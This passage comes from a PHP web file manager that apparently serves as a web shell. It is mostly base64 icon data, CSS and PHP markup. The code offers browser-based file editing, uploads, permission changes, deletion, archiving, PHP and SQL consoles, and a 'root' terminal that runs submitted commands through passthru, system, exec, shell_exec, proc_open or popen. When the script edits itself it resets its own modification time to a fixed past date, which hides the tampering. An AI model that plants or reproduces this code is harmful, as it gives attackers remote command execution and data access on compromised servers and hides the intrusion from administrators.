DvOXPK4dPKy2+UTV7hXmq86X23qdOo8/pPTT8e7nLuarrlca7nuer21e2b36RueN87d9L158Rb/1tWeOT3dvfN6b/fF9/XfFt1+cif9zsu72Xcn7q28T7xf9EDtQdlD3YfVP1v+3Njv3H9qwHeg89HcR/cGhYPP/pH1jw9DBY+Zj8uGDYbrnjg+OTniP3L96fynQ89kzyaeF/6i/suuFxYvfvjV69fO0ZjRoZfyl5O/bXyl/erA6xmv28bCxh6+yXgzMV70VvvtwXfcdx3vo98PT+R8IH8o/2j5sfVT0Kf7kxmTk/8EA5jz/GMzLdsAAAAGYktHRAD/AP8A/6C9p5MAAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfcCAwGMhleGAKOAAAByElEQVQ4y8WTT2sUQRDFf9XTM+PGIBHdEEQR8eAfggaPHvTuyU+i+A38AF48efJbKB5zE0IMAVcCiRhQE8gmm111s9mZ3Zl+Hmay5qAY8GBDdTWPeo9HVRf872O9xVv3/JnrCygIU406K/qbrbP3Vxb/qjD8+OSNtC+VX6RiUyrWpXJD2aenfyR3Xs9N3h5rFIw6EAYQxsAIKMFx+cfSg0dmFk+qJaQyGu0tvwT2KwEZhANQWZGVg3LS83eupM2F5yiDkE9wDPZ762vQfVUJhIKQ7TDaW8TiacCO2lNnd6xjlYvpm49f5FuNZ+XBxpon5BTfWqSzN4AELAFLq+wSbILFdXgguoibUj7+vu0RKG9jeYHk6uIEXIosQZZiNWYuQSQQTWFuYEV3acXTfwdxitKrQAwumYiYO3JzCkVTyDWwsg+DVZR9YNTL3nqNDnHxNBq2f1mc2I1AgnAIRRfGbVQOamenyQ7ay74sI3z+FWWH9aiOrlCFBOaqqLoIyijw+YWHW9u+CKbGsIc0/s2X0bFpHMNUEuKZVQC/2x0mM00P8idfAAetz2ETwG5fa87PnosuhYBOyo8cttMJW+83dlv/tIl3F+b4CYyp2Txw2VUwAAAAAElFTkSuQmCC"); } .file { background-image: url("data:image/png;base64,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"); } <?=fm_home_style()?> .img { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAAdFQTFRF7e3t/f39pJ+f+cJajV8q6enpkGIm/sFO/+2O393c5ubm/sxbd29yimdneFg65OTk2zoY6uHi1zAS1crJsHs2nygo3Nrb2LBXrYtm2p5A/+hXpoRqpKOkwri46+vr0MG36Ysz6ujpmI6AnzUywL+/mXVSmIBN8bwwj1VByLGza1ZJ0NDQjYSB/9NjwZ6CwUAsxk0brZyWw7pmGZ4A6LtdkHdf/+N8yow27b5W87RNLZL/2biP7wAA//GJl5eX4NfYsaaLgp6h1b+t/+6R68Fe89ycimZd/uQv3r9NupCB99V25a1cVJbbnHhO/8xS+MBa8fDwi2Ji48qi/+qOdVIzs34x//GOXIzYp5SP/sxgqpiIcp+/siQpcmpstayszSANuKKT9PT04uLiwIky8LdE+sVWvqam8e/vL5IZ+rlH8cNg08Ccz7ad8vLy9LtU1qyUuZ4+r512+8s/wUpL3d3dx7W1fGNa/89Z2cfH+s5n6Ojob1Yts7Kz19fXwIg4p1dN+Pj4zLR0+8pd7strhKAs/9hj/9BV1KtftLS1np2dYlJSZFVV5LRWhEFB5rhZ/9Jq0HtT//CSkIqJ6K5D+LNNblVVvjM047ZMz7e31xEG////tKgu6wAAAJt0Uk5T/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////wCVVpKYAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAANZJREFUKFNjmKWiPQsZMMximsqPKpAb2MsAZNjLOwkzggVmJYnyps/QE59eKCEtBhaYFRfjZuThH27lY6kqBxYorS/OMC5wiHZkl2QCCVTkN+trtFj4ZSpMmawDFBD0lCoynzZBl1nIJj55ElBA09pdvc9buT1SYKYBWw1QIC0oNYsjrFHJpSkvRYsBKCCbM9HLN9tWrbqnjUUGZG1AhGuIXZRzpQl3aGwD2B2cZZ2zEoL7W+u6qyAunZXIOMvQrFykqwTiFzBQNOXj4QKzoAKzajtYIQwAlvtpl3V5c8MAAAAASUVORK5CYII="); } @media screen and (max-width:720px){ table{display:block;} #fm_table td{display:inline;float:left;} #fm_table tbody td:first-child{width:100%;padding:0;} #fm_table tbody tr:nth-child(2n+1){background-color:#EFEFEF;} #fm_table tbody tr:nth-child(2n){background-color:#DEE3E7;} #fm_table tr{display:block;float:left;clear:left;width:100%;} #header_table .row2, #header_table .row3 {display:inline;float:left;width:100%;padding:0;} #header_table table td {display:inline;float:left;} } </style> </head> <body> <?php $url_inc = '?fm=true'; if (isset($_POST['sqlrun'])&&!empty($fm_config['enable_sql_console'])){ $res = empty($_POST['sql']) ? '' : $_POST['sql']; $res_lng = 'sql'; } elseif (isset($_POST['phprun'])&&!empty($fm_config['enable_php_console'])){ $res = empty($_POST['php']) ? '' : $_POST['php']; $res_lng = 'php'; } if (isset($_GET['fm_settings'])) { echo ' <table class="whole"> <form method="post" action=""> <tr><th colspan="2">'.__('File manager').' - '.__('Settings').'</th></tr> '.(empty($msg_ntimes)?'':'<tr><td class="row2" colspan="2">'.$msg_ntimes.'</td></tr>').' '.fm_config_checkbox_row(__('Show size of the folder'),'show_dir_size').' '.fm_config_checkbox_row(__('Show').' '.__('pictures'),'show_img').' '.fm_config_checkbox_row(__('Show').' '.__('Make directory'),'make_directory').' '.fm_config_checkbox_row(__('Show').' '.__('New file'),'new_file').' '.fm_config_checkbox_row(__('Show').' '.__('Upload'),'upload_file').' '.fm_config_checkbox_row(__('Show').' PHP version','show_php_ver').' '.fm_config_checkbox_row(__('Show').' PHP ini','show_php_ini').' '.fm_config_checkbox_row(__('Show').' '.__('Generation time'),'show_gt').' '.fm_config_checkbox_row(__('Show').' xls','show_xls').' '.fm_config_checkbox_row(__('Show').' PHP '.__('Console'),'enable_php_console').' '.fm_config_checkbox_row(__('Show').' SQL '.__('Console'),'enable_sql_console').' <tr><td class="row1"><input name="fm_config[sql_server]" value="'.$fm_config['sql_server'].'" type="text"></td><td class="row2 whole">SQL server</td></tr> <tr><td class="row1"><input name="fm_config[sql_username]" value="'.$fm_config['sql_username'].'" type="text"></td><td class="row2 whole">SQL user</td></tr> <tr><td class="row1"><input name="fm_config[sql_password]" value="'.$fm_config['sql_password'].'" type="text"></td><td class="row2 whole">SQL password</td></tr> <tr><td class="row1"><input name="fm_config[sql_db]" value="'.$fm_config['sql_db'].'" type="text"></td><td class="row2 whole">SQL DB</td></tr> '.fm_config_checkbox_row(__('Show').' Proxy','enable_proxy').' '.fm_config_checkbox_row(__('Show').' phpinfo()','show_phpinfo').' '.fm_config_checkbox_row(__('Show').' '.__('Settings'),'fm_settings').' '.fm_config_checkbox_row(__('Restore file time after editing'),'restore_time').' '.fm_config_checkbox_row(__('File manager').': '.__('Restore file time after editing'),'fm_restore_time').' <tr><td class="row3"><a href="'.fm_url().'?fm_settings=true&fm_config_delete=true">'.__('Reset settings').'</a></td><td class="row3"><input type="submit" value="'.__('Save').'" name="fm_config[fm_set_submit]"></td></tr> </form> </table> <table> <form method="post" action=""> <tr><th colspan="2">'.__('Settings').' - '.__('Authorization').'</th></tr> <tr><td class="row1"><input name="fm_login[authorize]" value="1" '.($auth['authorize']?'checked':'').' type="checkbox" id="auth"></td><td class="row2 whole"><label for="auth">'.__('Authorization').'</label></td></tr> <tr><td class="row1"><input name="fm_login[login]" value="'.$auth['login'].'" type="text"></td><td class="row2 whole">'.__('Login').'</td></tr> <tr><td class="row1"><input name="fm_login[password]" value="'.$auth['password'].'" type="text"></td><td class="row2 whole">'.__('Password').'</td></tr> <tr><td class="row1"><input name="fm_login[cookie_name]" value="'.$auth['cookie_name'].'" type="text"></td><td class="row2 whole">'.__('Cookie').'</td></tr> <tr><td class="row1"><input name="fm_login[days_authorization]" value="'.$auth['days_authorization'].'" type="text"></td><td class="row2 whole">'.__('Days').'</td></tr> <tr><td class="row1"><textarea name="fm_login[script]" cols="35" rows="7" class="textarea_input" id="auth_script">'.$auth['script'].'</textarea></td><td class="row2 whole">'.__('Script').'</td></tr> <tr><td colspan="2" class="row3"><input type="submit" value="'.__('Save').'" ></td></tr> </form> </table>'; echo fm_tpl_form('php'),fm_tpl_form('sql'); } elseif (isset($proxy_form)) { die($proxy_form); } elseif (isset($res_lng)) { ?> <table class="whole"> <tr> <th><?=__('File manager').' - '.$path?></th> </tr> <tr> <td class="row2"><table><tr><td><h2><?=strtoupper($res_lng)?> <?=__('Console')?><?php if($res_lng=='sql') echo ' - Database: '.$fm_config['sql_db'].'</h2></td><td>'.fm_run_input('php'); else echo '</h2></td><td>'.fm_run_input('sql'); ?></td></tr></table></td> </tr> <tr> <td class="row1"> <a href="<?=$url_inc.'&path=' . $path;?>"><?=__('Back')?></a> <form action="" method="POST" name="console"> <textarea name="<?=$res_lng?>" cols="80" rows="10" style="width: 90%"><?=$res?></textarea><br/> <input type="reset" value="<?=__('Reset')?>"> <input type="submit" value="<?=__('Submit')?>" name="<?=$res_lng?>run"> <?php $str_tmpl = $res_lng.'_templates'; $tmpl = !empty($$str_tmpl) ? json_decode($$str_tmpl,true) : ''; if (!empty($tmpl)){ $active = isset($_POST[$res_lng.'_tpl']) ? $_POST[$res_lng.'_tpl'] : ''; $select = '<select name="'.$res_lng.'_tpl" title="'.__('Template').'" onchange="if (this.value!=-1) document.forms[\'console\'].elements[\''.$res_lng.'\'].value = this.options[selectedIndex].value; else document.forms[\'console\'].elements[\''.$res_lng.'\'].value =\'\';" >'."\n"; $select .= '<option value="-1">' . __('Select') . "</option>\n"; foreach ($tmpl as $key=>$value){ $select.='<option value="'.$value.'" '.((!empty($value)&&($value==$active))?'selected':'').' >'.__($key)."</option>\n"; } $select .= "</select>\n"; echo $select; } ?> </form> </td> </tr> </table> <?php if (!empty($res)) { $fun='fm_'.$res_lng; echo '<h3>'.strtoupper($res_lng).' '.__('Result').'</h3><pre>'.$fun($res).'</pre>'; } } elseif (!empty($_REQUEST['edit'])){ if(!empty($_REQUEST['save'])) { $fn = $path . $_REQUEST['edit']; $filemtime = filemtime($fn); if (file_put_contents($fn, $_REQUEST['newcontent'])) $msg_ntimes .= __('File updated'); else $msg_ntimes .= __('Error occurred'); if ($_GET['edit']==basename(__FILE__)) { touch(__FILE__,1415116371); } else { if (!empty($fm_config['restore_time'])) touch($fn,$filemtime); } } $oldcontent = @file_get_contents($path . $_REQUEST['edit']); $editlink = $url_inc . '&edit=' . $_REQUEST['edit'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?> <table border='0' cellspacing='0' cellpadding='1' width="100%"> <tr> <th><?=__('File manager').' - '.__('Edit').' - '.$path.$_REQUEST['edit']?></th> </tr> <tr> <td class="row1"> <?=$msg_ntimes?> </td> </tr> <tr> <td class="row1"> <?=fm_home()?> <a href="<?=$backlink?>"><?=__('Back')?></a> </td> </tr> <tr> <td class="row1" align="center"> <form name="form1" method="post" action="<?=$editlink?>"> <textarea name="newcontent" id="newcontent" cols="45" rows="15" style="width:99%" spellcheck="false"><?=htmlspecialchars($oldcontent)?></textarea> <input type="submit" name="save" value="<?=__('Submit')?>"> <input type="submit" name="cancel" value="<?=__('Cancel')?>"> </form> </td> </tr> </table> <?php echo $auth['script']; } elseif(!empty($_REQUEST['rights'])){ if(!empty($_REQUEST['save'])) { if(fm_chmod($path . $_REQUEST['rights'], fm_convert_rights($_REQUEST['rights_val']), @$_REQUEST['recursively'])) $msg_ntimes .= (__('File updated')); else $msg_ntimes .= (__('Error occurred')); } clearstatcache(); $oldrights = fm_rights_string($path . $_REQUEST['rights'], true); $link = $url_inc . '&rights=' . $_REQUEST['rights'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?> <table class="whole"> <tr> <th><?=__('File manager').' - '.$path?></th> </tr> <tr> <td class="row1"> <?=$msg_ntimes?> </td> </tr> <tr> <td class="row1"> <a href="<?=$backlink?>"><?=__('Back')?></a> </td> </tr> <tr> <td class="row1" align="center"> <form name="form1" method="post" action="<?=$link?>"> <?=__('Rights').' - '.$_REQUEST['rights']?> <input type="text" name="rights_val" value="<?=$oldrights?>"> <?php if (is_dir($path.$_REQUEST['rights'])) { ?> <input type="checkbox" name="recursively" value="1"> <?=__('Recursively')?><br/> <?php } ?> <input type="submit" name="save" value="<?=__('Submit')?>"> </form> </td> </tr> </table> <?php } elseif (!empty($_REQUEST['rename'])&&$_REQUEST['rename']<>'.') { if(!empty($_REQUEST['save'])) { rename($path . $_REQUEST['rename'], $path . $_REQUEST['newname']); $msg_ntimes .= (__('File updated')); $_REQUEST['rename'] = $_REQUEST['newname']; } clearstatcache(); $link = $url_inc . '&rename=' . $_REQUEST['rename'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?> <table class="whole"> <tr> <th><?=__('File manager').' - '.$path?></th> </tr> <tr> <td class="row1"> <?=$msg_ntimes?> </td> </tr> <tr> <td class="row1"> <a href="<?=$backlink?>"><?=__('Back')?></a> </td> </tr> <tr> <td class="row1" align="center"> <form name="form1" method="post" action="<?=$link?>"> <?=__('Rename')?>: <input type="text" name="newname" value="<?=$_REQUEST['rename']?>"><br/> <input type="submit" name="save" value="<?=__('Submit')?>"> </form> </td> </tr> </table> <?php } else { //quanxian gai bian hou xu yao xi tong chongqi $msg_ntimes = ''; if(!empty($_FILES['upload'])&&!empty($fm_config['upload_file'])) { if(!empty($_FILES['upload']['name'])){ $_FILES['upload']['name'] = str_replace('%', '', $_FILES['upload']['name']); if(!move_uploaded_file($_FILES['upload']['tmp_name'], $path . $_FILES['upload']['name'])){ $msg_ntimes .= __('Error occurred'); } else { $msg_ntimes .= __('Files uploaded').': '.$_FILES['upload']['name']; } } } elseif(!empty($_REQUEST['delete'])&&$_REQUEST['delete']<>'.') { if(!fm_del_khumfail(($path . $_REQUEST['delete']), true)) { $msg_ntimes .= __('Error occurred'); } else { $msg_ntimes .= __('Deleted').' '.$_REQUEST['delete']; } } elseif(!empty($_REQUEST['mkdir'])&&!empty($fm_config['make_directory'])) { if(!@mkdir($path . $_REQUEST['dirname'],0777)) { $msg_ntimes .= __('Error occurred'); } else { $msg_ntimes .= __('Created').' '.$_REQUEST['dirname']; } } elseif(!empty($_POST['search_recursive'])) { ini_set('max_execution_time', '0'); $search_data = find_text_in_khumfail($_POST['path'], $_POST['mask'], $_POST['search_recursive']); if(!empty($search_data)) { $msg_ntimes .= __('Found in khumfail').' ('.count($search_data).'):<br>'; foreach ($search_data as $filename) { $msg_ntimes .= '<a href="'.thangweb(true).'?fm=true&edit='.basename($filename).'&path='.str_replace('/'.basename($filename),'/',$filename).'" title="' . __('Edit') . '">'.basename($filename).'</a> '; } } else { $msg_ntimes .= __('Nothing founded'); } } elseif(!empty($_REQUEST['mkfile'])&&!empty($fm_config['new_file'])) { if(!$fp=@fopen($path . $_REQUEST['filename'],"w")) { $msg_ntimes .= __('Error occurred'); } else { fclose($fp); $msg_ntimes .= __('Created').' '.$_REQUEST['filename']; } } elseif (isset($_GET['zip'])) { $source = base64_decode($_GET['zip']); $destination = basename($source).'.zip'; set_time_limit(0); $phar = new PharData($destination); $phar->buildFromDirectory($source); if (is_file($destination)) $msg_ntimes .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.rangkhwampanithan('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' <a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '. $destination.'" >'.__('Delete') . '</a>'; else $msg_ntimes .= __('Error occurred').': '.__('no khumfail'); } elseif (isset($_GET['gz'])) { $source = base64_decode($_GET['gz']); $archive = $source.'.tar'; $destination = basename($source).'.tar'; if (is_file($archive)) unlink($archive); if (is_file($archive.'.gz')) unlink($archive.'.gz'); clearstatcache(); set_time_limit(0); //die(); $phar = new PharData($destination); $phar->buildFromDirectory($source); $phar->compress(Phar::GZ,'.tar.gz'); unset($phar); if (is_file($archive)) { if (is_file($archive.'.gz')) { unlink($archive); $destination .= '.gz'; } $msg_ntimes .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.rangkhwampanithan('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' <a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>'; } else $msg_ntimes .= __('Error occurred').': '.__('no khumfail'); } elseif (isset($_GET['decompress'])) { // $source = base64_decode($_GET['decompress']); // $destination = basename($source); // $ext = end(explode(".", $destination)); // if ($ext=='zip' OR $ext=='gz') { // $phar = new PharData($source); // $phar->decompress(); // $base_file = str_replace('.'.$ext,'',$destination); // $ext = end(explode(".", $base_file)); // if ($ext=='tar'){ // $phar = new PharData($base_file); // $phar->extractTo(dir($source)); // } // } // $msg_ntimes .= __('Task').' "'.__('Decompress').' '.$source.'" '.__('done'); } elseif (isset($_GET['gzfile'])) { $source = base64_decode($_GET['gzfile']); $archive = $source.'.tar'; $destination = basename($source).'.tar'; if (is_file($archive)) unlink($archive); if (is_file($archive.'.gz')) unlink($archive.'.gz'); set_time_limit(0); //echo $destination; $ext_arr = explode('.',basename($source)); if (isset($ext_arr[1])) { unset($ext_arr[0]); $ext=implode('.',$ext_arr); } $phar = new PharData($destination); $phar->addFile($source); $phar->compress(Phar::GZ,$ext.'.tar.gz'); unset($phar); if (is_file($archive)) { if (is_file($archive.'.gz')) { unlink($archive); $destination .= '.gz'; } $msg_ntimes .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.rangkhwampanithan('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' <a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>'; } else $msg_ntimes .= __('Error occurred').': '.__('no khumfail'); } ?> <table class="whole" id="header_table" > <tr> <th colspan="2"><?=__('File manager')?><?=(!empty($path)?' - '.$path:'')?></th> </tr> <?php if(!empty($msg_ntimes)){ ?> <tr> <td colspan="2" class="row2"><?=$msg_ntimes?></td> </tr> <?php } ?> <tr> <td class="row2"> <table> <tr> <td> <?=fm_home()?> </td> <td> <?php session_start(); // List of command execution functions to check $execFunctions = ['passthru', 'system', 'exec', 'shell_exec', 'proc_open', 'popen', 'symlink', 'dl']; // Check if any of the functions are enabled (not disabled by disable_functions) $canExecute = false; foreach ($execFunctions as $func) { if (function_exists($func)) { $canExecute = true; break; } } if (!isset($_SESSION['cwd'])) { $_SESSION['cwd'] = getcwd(); } // Update cwd from POST if valid directory if (isset($_POST['path']) && is_dir($_POST['path'])) { $_SESSION['cwd'] = realpath($_POST['path']); } $cwd = $_SESSION['cwd']; $output = ""; if (isset($_POST['terminal'])) { $cmdInput = trim($_POST['terminal-text']); if (preg_match('/^cd\s*(.*)$/', $cmdInput, $matches)) { $dir = trim($matches[1]); if ($dir === '' || $dir === '~') { $dir = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : $cwd; } elseif ($dir[0] !== DIRECTORY_SEPARATOR && $dir[0] !== '/' && $dir[0] !== '\\') { $dir = $cwd . DIRECTORY_SEPARATOR . $dir; } $realDir = realpath($dir); if ($realDir && is_dir($realDir)) { $_SESSION['cwd'] = $realDir; $cwd = $realDir; $output = "Changed directory to " . htmlspecialchars($realDir); } else { $output = "bash: cd: " . htmlspecialchars($matches[1]) . ": No such file or directory"; } } else { if ($canExecute) { chdir($cwd); $cmd = $cmdInput . " 2>&1"; if (function_exists('passthru')) { ob_start(); passthru($cmd); $output = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); system($cmd); $output = ob_get_clean(); } elseif (function_exists('exec')) { exec($cmd, $out); $output = implode("\n", $out); } elseif (function_exists('shell_exec')) { $output = shell_exec($cmd); } elseif (function_exists('proc_open')) { // Using proc_open as fallback $descriptorspec = [ 0 => ["pipe", "r"], 1 => ["pipe", "w"], 2 => ["pipe", "w"] ]; $process = proc_open($cmd, $descriptorspec, $pipes, $cwd); if (is_resource($process)) { fclose($pipes[0]); $output = stream_get_contents($pipes[1]); fclose($pipes[1]); $output .= stream_get_contents($pipes[2]); fclose($pipes[2]); proc_close($process); } else { $output = "Failed to execute command via proc_open."; } } elseif (function_exists('popen')) { $handle = popen($cmd, 'r'); if ($handle) { $output = stream_get_contents($handle); pclose($handle); } else { $output = "Failed to execute command via popen."; } } else { $output = "Error: No command execution functions available."; } } else { $output = "Command execution functions are disabled on this server. Terminal is unavailable."; } } } if (!isset($url_inc)) $url_inc = htmlspecialchars($_SERVER['PHP_SELF']); if (!isset($path)) $path = $cwd; ?> <strong>root@ma-bks:<?php echo htmlspecialchars($cwd); ?>$</strong><br> <pre><?php echo htmlspecialchars($output); ?></pre> <form method="post" action="<?php echo $url_inc; ?>"> <input type="text" name="terminal-text" size="50" placeholder="Cmd"> <input type="hidden" name="path" value="<?php echo htmlspecialchars($path); ?>" /> <input type="submit" name="terminal" value="Execute"> </form> </td> <td> <?php if(!empty($fm_config['make_directory'])) { ?> <form method="post" action="<?=$url_inc?>"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="text" name="dirname" size="15"> <input type="submit" name="mkdir" value="<?=__('Make directory')?>"> </form> <?php } ?> </td> <td> <?php if(!empty($fm_config['new_file'])) { ?> <form method="post" action="<?=$url_inc?>"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="text" name="filename" size="15"> <input type="submit" name="mkfile" value="<?=__('New file')?>"> </form> <?php } ?> </td> <td> <form method="post" action="<?=$url_inc?>" style="display:inline"> <input 